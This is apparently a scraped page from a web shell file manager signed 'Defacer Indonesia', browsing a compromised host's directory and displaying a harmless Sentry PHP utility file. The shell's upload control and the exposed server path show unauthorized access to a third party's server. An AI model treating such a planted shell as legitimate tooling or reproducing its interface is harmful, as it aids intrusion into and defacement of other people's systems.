whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
sentry
/
sentry
/
src
/
Util
/
Upload File:
files >> //home/kckglobal/www/portal/vendor/sentry/sentry/src/Util/PHPConfiguration.php
<?php declare(strict_types=1); namespace Sentry\Util; class PHPConfiguration { public static function isBooleanIniOptionEnabled(string $option): bool { $value = \ini_get($option); if (empty($value)) { return false; } // https://www.php.net/manual/en/function.ini-get.php#refsect1-function.ini-get-notes return \in_array(strtolower($value), ['1', 'on', 'true'], true); } }
Copyright ©2021 || Defacer Indonesia